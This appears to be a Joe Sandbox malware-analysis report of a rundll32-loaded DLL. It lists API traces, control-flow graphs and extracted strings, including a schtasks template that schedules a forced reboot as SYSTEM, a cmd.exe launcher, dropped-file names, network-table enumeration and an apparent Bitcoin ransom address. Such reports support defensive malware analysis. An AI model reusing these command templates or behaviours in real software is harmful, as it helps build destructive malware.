                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: BufferFreeInfoServer
                                                • String ID:
                                                • API String ID: 3855943681-0
                                                • Opcode ID: e9485f5e6b81f46b1f88d0c2195f975262ab6f0874469d9f7fba7ffeb2a2b687
                                                • Instruction ID: f1ff8b5e69461baa88bf571e2d4235c4b086bff244a925521fa7acc11d7b03dc
                                                • Opcode Fuzzy Hash: e9485f5e6b81f46b1f88d0c2195f975262ab6f0874469d9f7fba7ffeb2a2b687
                                                • Instruction Fuzzy Hash: 3EE09B39A51734A7DF28CA568D04FAB7A5CDF01599F105018EC86D2104D720DE4186D0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentProcess.KERNEL32(?,74DF0F10,?,02E57EB2), ref: 02E5755C
                                                • GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,74DF0F10,?,02E57EB2), ref: 02E57571
                                                • GetProcAddress.KERNEL32(00000000), ref: 02E57578
                                                • FindResourceW.KERNEL32(00000001,0000000A,?,74DF0F10,?,02E57EB2), ref: 02E5759B
                                                • GetTempPathW.KERNEL32(00000208,?,?,74DF0F10,?,02E57EB2), ref: 02E575CC
                                                • GetTempFileNameW.KERNELBASE(?,00000000,00000000,?,?,74DF0F10,?,02E57EB2), ref: 02E575EA
                                                • CoCreateGuid.OLE32(?,00000000,?,74DF0F10,?,02E57EB2), ref: 02E57608
                                                • StringFromCLSID.OLE32(?,?,?,74DF0F10,?,02E57EB2), ref: 02E57621
                                                • wsprintfW.USER32 ref: 02E5765E
                                                • CreateThread.KERNELBASE(00000000,00000000,02E573FD,?,00000000,00000000), ref: 02E57675
                                                • memset.MSVCRT ref: 02E57698
                                                • wsprintfW.USER32 ref: 02E576C0
                                                • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 02E576E5
                                                • WaitForSingleObject.KERNEL32(?,0000EA60), ref: 02E576F7
                                                  • Part of subcall function 02E570FA: EnterCriticalSection.KERNEL32(02CD5F60,02E57EBD), ref: 02E570FF
                                                  • Part of subcall function 02E570FA: InterlockedExchange.KERNEL32(02CD5F88,00000001), ref: 02E5710B
                                                  • Part of subcall function 02E570FA: LeaveCriticalSection.KERNEL32(02CD5F60), ref: 02E57112
                                                • TerminateThread.KERNELBASE(?,00000000), ref: 02E5770C
                                                • CloseHandle.KERNEL32(?), ref: 02E57715
                                                • DeleteFileW.KERNELBASE(?,?,?), ref: 02E57744
                                                • CoTaskMemFree.OLE32(?,?,?,?,74DF0F10,?,02E57EB2), ref: 02E5774D
                                                • GetProcessHeap.KERNEL32(00000000,?,?,74DF0F10,?,02E57EB2), ref: 02E5776A
                                                • RtlFreeHeap.NTDLL(00000000,?,74DF0F10,?,02E57EB2), ref: 02E57771
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateProcess$CriticalFileFreeHandleHeapSectionTempThreadwsprintf$AddressCloseCurrentDeleteEnterExchangeFindFromGuidInterlockedLeaveModuleNameObjectPathProcResourceSingleStringTaskTerminateWaitmemset
                                                • String ID: "%ws" %ws$IsWow64Process$\\.\pipe\%ws$kernel32.dll
                                                • API String ID: 1832780381-754074379
                                                • Opcode ID: 162f02784d7d318620a80048e3569ef6996e7bb69a6487439eece5b4f6981813
                                                • Instruction ID: 7e71dfc1fb657d3c3363c56dc7ade32f157db73c8f85a56593c65f93b0986468
                                                • Opcode Fuzzy Hash: 162f02784d7d318620a80048e3569ef6996e7bb69a6487439eece5b4f6981813
                                                • Instruction Fuzzy Hash: B9512F71E90228AFEB10DFE5DD88DEEB77DEF08245F545469FA06E2110D7309AA4CB21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • FreeLibrary.KERNELBASE ref: 02E594B2
                                                • CreateFileW.KERNELBASE(C:\Windows\dllcm.dat,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02E594E9
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 02E594F4
                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 02E59500
                                                • CreateFileW.KERNELBASE(C:\Windows\dllcm.dat,40000000,00000000,00000000,00000002,00000000,00000000), ref: 02E59512
                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 02E59526
                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02E59529
                                                • WriteFile.KERNELBASE(?,00000000,?,?,00000000), ref: 02E59542
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02E5954C
                                                • HeapFree.KERNEL32(00000000), ref: 02E5954F
                                                • CloseHandle.KERNEL32(?), ref: 02E59558
                                                • DeleteFileW.KERNELBASE(C:\Windows\dllcm.dat), ref: 02E5955F
                                                • ExitProcess.KERNEL32 ref: 02E59585
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$Heap$Process$CloseCreateFree$AllocateChangeDeleteExitFindHandleLibraryNotificationSizeWrite
                                                • String ID: C:\Windows\dllcm.dat
                                                • API String ID: 1556359713-1561905061
                                                • Opcode ID: 3edc51f01909199ed159fa73e3342aaace5ccffd4ff9787098d338ef99149068
                                                • Instruction ID: 13a9ad2a444ab4c01acc1be667f6f7920c15699eaa53bd02a85199604e84812a
                                                • Opcode Fuzzy Hash: 3edc51f01909199ed159fa73e3342aaace5ccffd4ff9787098d338ef99149068
                                                • Instruction Fuzzy Hash: F321F8718D1224FBCB116FA2ED0CE8FBF6AEF49754F508815FA02A2151C73586A1DBB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                control_flow_graph 332 2e58999-2e589c1 FindResourceW 333 2e589c3-2e589cb call 2e585d0 332->333 334 2e589d2 332->334 337 2e589d0 333->337 336 2e589d4-2e589d6 334->336 338 2e58abd-2e58acc SetLastError 336->338 339 2e589dc-2e58a06 GetProcessHeap HeapAlloc 336->339 337->336 340 2e58a12-2e58a22 SHGetFolderPathW 339->340 341 2e58a08-2e58a10 GetWindowsDirectoryW 339->341 343 2e58a24-2e58a29 340->343 344 2e58a59-2e58a66 GetProcessHeap HeapFree 340->344 342 2e58a3b-2e58a3d 341->342 342->344 345 2e58a3f-2e58a44 342->345 347 2e58a2c-2e58a35 343->347 346 2e58a6d-2e58a74 344->346 345->344 348 2e58a46-2e58a57 PathAppendW 345->348 349 2e58a76-2e58a7f call 2e58946 346->349 350 2e58aa1-2e58aa9 346->350 347->347 351 2e58a37-2e58a39 347->351 348->346 355 2e58a84-2e58a86 349->355 353 2e58ab2-2e58abc GetProcessHeap HeapFree 350->353 354 2e58aab-2e58ab0 350->354 351->342 353->338 354->353 354->354 356 2e58a88-2e58a94 GetLastError 355->356 357 2e58a9a 355->357 356->350 358 2e58a96 356->358 357->350 358->357
                                                APIs
                                                • FindResourceW.KERNEL32(00000003,0000000A,00000000,74DF0F10), ref: 02E589B9
                                                • GetProcessHeap.KERNEL32(00000008,00000208,02CD5F60), ref: 02E589EA
                                                • HeapAlloc.KERNEL32(00000000), ref: 02E589ED
                                                • GetWindowsDirectoryW.KERNEL32(00000000,00000104), ref: 02E58A0A
                                                • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,00000000), ref: 02E58A1A
                                                • PathAppendW.SHLWAPI(dllhost.dat), ref: 02E58A51
                                                • GetProcessHeap.KERNEL32(00000000), ref: 02E58A61
                                                • HeapFree.KERNEL32(00000000), ref: 02E58A64
                                                • GetLastError.KERNEL32(02D95060,?,00000000), ref: 02E58A88
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02E58AB7
                                                • HeapFree.KERNEL32(00000000), ref: 02E58ABA
                                                • SetLastError.KERNEL32(?), ref: 02E58AC0
                                                  • Part of subcall function 02E585D0: LoadResource.KERNEL32(02CE5020,?,?,?,02E52121,000001BD,00000000,?,?,02E564AC,?,?), ref: 02E585E2
                                                  • Part of subcall function 02E585D0: LockResource.KERNEL32(00000000,?,?,?,?,02E52121,000001BD,00000000,?,?,02E564AC,?,?), ref: 02E585F2
                                                  • Part of subcall function 02E585D0: SizeofResource.KERNEL32(02CE5020,?,?,?,02E52121,000001BD,00000000,?,?,02E564AC,?,?), ref: 02E58607
                                                  • Part of subcall function 02E585D0: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,?,02E52121,000001BD,00000000,?,?,02E564AC,?,?), ref: 02E5861F
                                                  • Part of subcall function 02E585D0: RtlAllocateHeap.NTDLL(00000000,?,?,?,02E52121,000001BD,00000000,?,?,02E564AC,?,?), ref: 02E58622
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$ProcessResource$ErrorFreeLastPath$AllocAllocateAppendDirectoryFindFolderLoadLockSizeofWindows
                                                • String ID: dllhost.dat
                                                • API String ID: 957509510-565127240
                                                • Opcode ID: 81da9aac9226610060e3de8547fc8e14c577530e43c52ef93222fde06d4fa983
                                                • Instruction ID: 07cbd6ea2ecc11b95a6dceaf6fb2782a2d9d716bfffac4d9b6c60a25ae01dc4a
                                                • Opcode Fuzzy Hash: 81da9aac9226610060e3de8547fc8e14c577530e43c52ef93222fde06d4fa983
                                                • Instruction Fuzzy Hash: FD318F71ED0224ABDF10DBA6EC48BAF7BB9EB44345F449811F906E6141D7709A908B60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                control_flow_graph 359 2e5777b-2e57794 LoadLibraryW 360 2e57864-2e57868 359->360 361 2e5779a-2e577ac GetProcAddress 359->361 362 2e57853 GetLastError 361->362 363 2e577b2-2e577d1 GetProcessHeap RtlAllocateHeap 361->363 364 2e57859-2e57863 FreeLibrary 362->364 363->364 365 2e577d7-2e577eb 363->365 364->360 367 2e57841-2e57851 GetProcessHeap RtlFreeHeap 365->367 368 2e577ed-2e577f4 365->368 367->364 368->367 369 2e577f6 368->369 370 2e577f9-2e577fd 369->370 371 2e57834-2e5783f 370->371 372 2e577ff-2e57831 wsprintfW call 2e56fc7 370->372 371->367 371->370 372->371
                                                APIs
                                                • LoadLibraryW.KERNEL32(iphlpapi.dll,00000000), ref: 02E57789
                                                • GetProcAddress.KERNEL32(00000000,GetExtendedTcpTable), ref: 02E577A2
                                                • GetProcessHeap.KERNEL32(00000008,00100000), ref: 02E577BD
                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02E577C4
                                                • wsprintfW.USER32 ref: 02E5781B
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02E57844
                                                • RtlFreeHeap.NTDLL(00000000), ref: 02E5784B
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02E57C7F), ref: 02E57853
                                                • FreeLibrary.KERNEL32(02CD6160), ref: 02E5785C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$FreeLibraryProcess$AddressAllocateErrorLastLoadProcwsprintf
                                                • String ID: %u.%u.%u.%u$GetExtendedTcpTable$iphlpapi.dll
                                                • API String ID: 2876140663-442984071
                                                • Opcode ID: f9ec74d5259b51db7a4ca6345b395d991a13b2a289821513e1ade4253e14e8f7
                                                • Instruction ID: 3df502ddd45510a957cd788751ab90526442d87dd466623545cf00df70dddc7b
                                                • Opcode Fuzzy Hash: f9ec74d5259b51db7a4ca6345b395d991a13b2a289821513e1ade4253e14e8f7
                                                • Instruction Fuzzy Hash: 4F21A271DE0335BBDB209BA58C48B6EFBBDAF08305F445515F941E2140D77495A0CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                control_flow_graph 375 2e514a9-2e5157a memset * 7 call 2e51038 378 2e51895-2e51899 375->378 379 2e51580-2e5158b call 2e5122d 375->379 381 2e51590-2e51597 379->381 381->378 382 2e5159d-2e515a0 381->382 383 2e515a2-2e515a7 382->383 384 2e515ac-2e515c1 call 2e51424 382->384 385 2e51890 383->385 384->378 388 2e515c7 384->388 385->378 389 2e515c9-2e515e6 388->389 389->389 390 2e515e8-2e51602 call 2e512d5 389->390 390->378 393 2e51608-2e51611 390->393 394 2e51613-2e51617 393->394 395 2e51620-2e51624 394->395 396 2e51619-2e5161c 394->396 395->394 398 2e51626-2e51629 395->398 396->395 397 2e5161e 396->397 397->395 399 2e5162d-2e51630 398->399 400 2e5162b 398->400 401 2e51632-2e51637 399->401 402 2e5163c-2e5164f 399->402 400->399 401->385 403 2e51651-2e5165f 402->403 403->403 404 2e51661-2e51694 memset call 2e51424 403->404 404->378 407 2e5169a-2e516af call 2e51424 404->407 407->378 410 2e516b5-2e516d5 memcpy 407->410 411 2e516d8-2e516dd 410->411 411->411 412 2e516df-2e516e3 411->412 413 2e516e5-2e516ec 412->413 414 2e5170c-2e51718 412->414 415 2e516f0-2e51704 memcpy 413->415 416 2e516ee 413->416 418 2e51721-2e5172f 414->418 419 2e5171a-2e5171f 414->419 415->414 416->415 420 2e51731-2e51738 418->420 419->420 420->378 421 2e5173e-2e5174f 420->421 423 2e51751-2e51756 421->423 424 2e51758-2e5176a memcpy 421->424 425 2e5176c-2e51773 423->425 424->425 425->378 426 2e51779-2e51795 425->426 428 2e51797-2e5179c 426->428 429 2e517a1-2e517d5 426->429 428->385 430 2e517d6-2e517e5 429->430 430->430 431 2e517e7-2e51806 memcpy 430->431 432 2e5182e 431->432 433 2e51808-2e5180c 431->433 434 2e51833-2e5183a 432->434 433->434 435 2e5180e-2e5181f call 2e51384 433->435 434->378 437 2e5183c-2e51859 call 2e51384 434->437 435->434 440 2e51821-2e5182a 435->440 437->378 443 2e5185b-2e51878 call 2e51384 437->443 440->435 442 2e5182c 440->442 442->434 443->378 446 2e5187a-2e5188b call 2e51384 443->446 446->385
                                                APIs
                                                • memset.MSVCRT ref: 02E514CB
                                                • memset.MSVCRT ref: 02E514E8
                                                • memset.MSVCRT ref: 02E51500
                                                • memset.MSVCRT ref: 02E51518
                                                • memset.MSVCRT ref: 02E51530
                                                • memset.MSVCRT ref: 02E51549
                                                • memset.MSVCRT ref: 02E5155C
                                                  • Part of subcall function 02E51038: memset.MSVCRT ref: 02E5105D
                                                  • Part of subcall function 02E51038: memset.MSVCRT ref: 02E51071
                                                  • Part of subcall function 02E51038: memset.MSVCRT ref: 02E510B9
                                                  • Part of subcall function 02E51038: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 02E510E3
                                                  • Part of subcall function 02E51038: GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,000001FF), ref: 02E510ED
                                                Strings
                                                • 1LeA4Raq3YNhk1XWRh3rJKk9xdNNoZDTkg, xrefs: 02E516BD
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: memset$DirectoryErrorLastSystem
                                                • String ID: 1LeA4Raq3YNhk1XWRh3rJKk9xdNNoZDTkg
                                                • API String ID: 3928605736-2116829844
                                                • Opcode ID: df3bbd0a3e070fe9ca78e785d26dff583a42b7da36142aa480da05246fb45da0
                                                • Instruction ID: 5243d53e6b4f96e5620daec70ed5f74952915401e406dac14b41d6def3141897
                                                • Opcode Fuzzy Hash: df3bbd0a3e070fe9ca78e785d26dff583a42b7da36142aa480da05246fb45da0
                                                • Instruction Fuzzy Hash: EAB12871D902299BDB21CAA4DC44BDF77EC9B05344F14A4F6EE0CEB241E7788A848F51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                control_flow_graph 448 2e5a0fe-2e5a11c 449 2e5a125-2e5a14d GetProcessHeap HeapAlloc 448->449 450 2e5a11e-2e5a120 call 2e59f8e 448->450 452 2e5a153-2e5a166 GetProcessHeap HeapAlloc 449->452 453 2e5a26b-2e5a271 449->453 450->449 452->453 454 2e5a16c-2e5a17c call 2e56f40 452->454 454->453 457 2e5a182-2e5a188 454->457 458 2e5a198-2e5a19f 457->458 459 2e5a1c4 458->459 460 2e5a1a1-2e5a1b3 CreateThread 458->460 463 2e5a1c8 459->463 461 2e5a263-2e5a266 call 2e56f78 460->461 462 2e5a1b9-2e5a1c2 460->462 461->453 462->463 464 2e5a1ca-2e5a1ce 463->464 466 2e5a1d0-2e5a1d7 464->466 467 2e5a1d9-2e5a1ed WaitForMultipleObjects 464->467 466->464 466->467 467->461 468 2e5a1ef-2e5a1f4 467->468 469 2e5a1f6-2e5a1fc 468->469 470 2e5a211-2e5a217 468->470 471 2e5a1fe-2e5a203 469->471 472 2e5a219-2e5a228 CloseHandle 470->472 473 2e5a22b-2e5a238 GetProcessHeap HeapAlloc 470->473 474 2e5a205-2e5a208 471->474 475 2e5a20c-2e5a20f 471->475 472->473 473->461 476 2e5a23a-2e5a24d GetProcessHeap HeapAlloc 473->476 474->471 477 2e5a20a 474->477 475->473 476->461 478 2e5a24f-2e5a25d call 2e56f02 476->478 477->473 478->461 481 2e5a18a-2e5a196 478->481 481->458
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 02E5A13E
                                                • HeapAlloc.KERNEL32(00000000), ref: 02E5A147
                                                • GetProcessHeap.KERNEL32(00000008,00000021), ref: 02E5A15C
                                                • HeapAlloc.KERNEL32(00000000), ref: 02E5A15F
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_0000A073,00000000,00000000,00000000), ref: 02E5A1AB
                                                • WaitForMultipleObjects.KERNEL32(?,00000000,00000000,000000FF,00000000), ref: 02E5A1E4
                                                • CloseHandle.KERNEL32(00000000), ref: 02E5A222
                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 02E5A22F
                                                • HeapAlloc.KERNEL32(00000000), ref: 02E5A232
                                                • GetProcessHeap.KERNEL32(00000008,00000021), ref: 02E5A23E
                                                • HeapAlloc.KERNEL32(00000000), ref: 02E5A241
                                                  • Part of subcall function 02E59F8E: GetCurrentThread.KERNEL32 ref: 02E59FA7
                                                  • Part of subcall function 02E59F8E: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02E5A125,00000000), ref: 02E59FAE
                                                  • Part of subcall function 02E59F8E: DuplicateTokenEx.ADVAPI32(00000000,02000000,00000000,00000002,00000002,02E5A125), ref: 02E59FC9
                                                  • Part of subcall function 02E59F8E: CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000,00000024,02E56EDA,00000000,0000FFFF), ref: 02E5A05B
                                                  • Part of subcall function 02E59F8E: CloseHandle.KERNEL32(02E5A125,?,00000000,00000000,00000000,00000024,02E56EDA,00000000,0000FFFF), ref: 02E5A068
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocProcess$CloseHandleThread$Token$CreateCurrentDuplicateMultipleObjectsOpenWait
                                                • String ID:
                                                • API String ID: 3129177753-0
                                                • Opcode ID: 26c646f6e2d29e9cdbc67159a0670d1ec9c404aeaf9f2975c262a7104bb9acbe
                                                • Instruction ID: d4f327d1372bbb499318bb78b29c6e19dd15af3b45d7d4bc54e616134448cca4
                                                • Opcode Fuzzy Hash: 26c646f6e2d29e9cdbc67159a0670d1ec9c404aeaf9f2975c262a7104bb9acbe
                                                • Instruction Fuzzy Hash: E641C5B0DA1225AFDF149FA5DD85BAE7775FB48314F209A39E906E7380DB709940CB20
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph (rendered graph omitted; node legend: Executed / Not Executed)
                                                APIs
                                                • GetLocalTime.KERNEL32(?,00000000), ref: 02E584F1
                                                  • Part of subcall function 02E56973: GetTickCount.KERNEL32 ref: 02E56973
                                                • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 02E58533
                                                • PathAppendW.SHLWAPI(?,shutdown.exe /r /f), ref: 02E5854D
                                                • wsprintfW.USER32 ref: 02E58589
                                                • wsprintfW.USER32 ref: 02E585A9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: wsprintf$AppendCountDirectoryLocalPathSystemTickTime
                                                • String ID: /RU "SYSTEM" $at %02d:%02d %ws$schtasks %ws/Create /SC once /TN "" /TR "%ws" /ST %02d:%02d$shutdown.exe /r /f
                                                • API String ID: 3115031192-1217748824
                                                • Opcode ID: 51e7e002c7431d566404ab02e1899c8f8c28b4494a9df476013631bfebb8cef9
                                                • Instruction ID: 5ba12c1452acb1cdd3e24c8201577922b06c0b0010a3eda5e5caddd92a66a021
                                                • Opcode Fuzzy Hash: 51e7e002c7431d566404ab02e1899c8f8c28b4494a9df476013631bfebb8cef9
                                                • Instruction Fuzzy Hash: 41214C72BD12285BEB34D765EC09FEB73AEDB88264F049561F909D2080EA70C9D4CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph (rendered graph omitted; node legend: Executed / Not Executed)
                                                APIs
                                                • wsprintfW.USER32 ref: 02E583DC
                                                • GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 02E58400
                                                • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 02E58412
                                                • lstrcatW.KERNEL32(?,\cmd.exe), ref: 02E58428
                                                • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 02E5846F
                                                • Sleep.KERNELBASE(02E585C7), ref: 02E58485
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateDirectoryEnvironmentProcessSleepSystemVariablelstrcatwsprintf
                                                • String ID: /c %ws$ComSpec$\cmd.exe
                                                • API String ID: 1518394870-1564754240
                                                • Opcode ID: 63e6f49046b2b333eb4b5010afb453d33d99118ed494af303ec85867f46030a2
                                                • Instruction ID: eb3bcdae7e992c389984085613b968837d7f6a940ade9644fb6bcaff2dd5b0ab
                                                • Opcode Fuzzy Hash: 63e6f49046b2b333eb4b5010afb453d33d99118ed494af303ec85867f46030a2
                                                • Instruction Fuzzy Hash: 3C21D7B2AC02286FE710DAE1DC84EFB77ACDB64255F008576F906E7140E6349A848B30
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph (rendered graph omitted; node legend: Executed / Not Executed)
                                                APIs
                                                • GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 02E57887
                                                • GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 02E578A5
                                                • HeapAlloc.KERNEL32(00000000), ref: 02E578AC
                                                • GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 02E578C5
                                                • wsprintfW.USER32 ref: 02E57917
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02E57943
                                                • HeapFree.KERNEL32(00000000), ref: 02E5794A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$ProcessTable$AllocFreewsprintf
                                                • String ID: %u.%u.%u.%u
